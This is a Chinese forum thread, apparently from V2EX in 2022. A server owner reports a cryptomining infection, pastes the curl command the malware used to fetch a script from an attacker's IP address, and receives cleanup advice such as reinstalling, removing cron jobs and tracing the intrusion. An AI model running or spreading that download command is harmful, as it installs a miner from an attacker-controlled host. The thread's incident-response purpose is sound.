这是一个创建于 1499 天前的主题,其中的信息可能已经有所发展或是发生改变。
今天阿里云告警被植入挖矿病毒了,上去检查了一番看见运行了 curl 从他的服务器上拉了一个脚本,求大佬帮助,基于脚本内容该怎么修复服务器?
curl -fsSL http://192.210.200.66:1234/xmss
 |
1
JDog 2022 年 1 月 21 日
不废话,直接重装
|
 |
2
mikeguan 2022 年 1 月 21 日 via Android
通过这个脚本又学习了
把定时任务干掉,把任意命令执行的脚本删掉应该就差不多了。 最关键的是找到从什么地方进来的,你给的脚本并不能反映你系统漏洞在哪 |
 |
5
v2YngK OP 已找到相关样本分析,https://www.52 坡姐.cn/thread-1540889-1-1.html
|
 |
6
gadfly3173 2022 年 1 月 21 日
可以考虑先用 sftp 之类的方式把 bash 之类的关键程序都换成干净的,然后检查下全服务器上所有最新修改的文件(如果它的脚本不会去伪造修改时间的话)然后再去看看从哪进来的。如果它会改时间的话还是重装吧
|
Select Language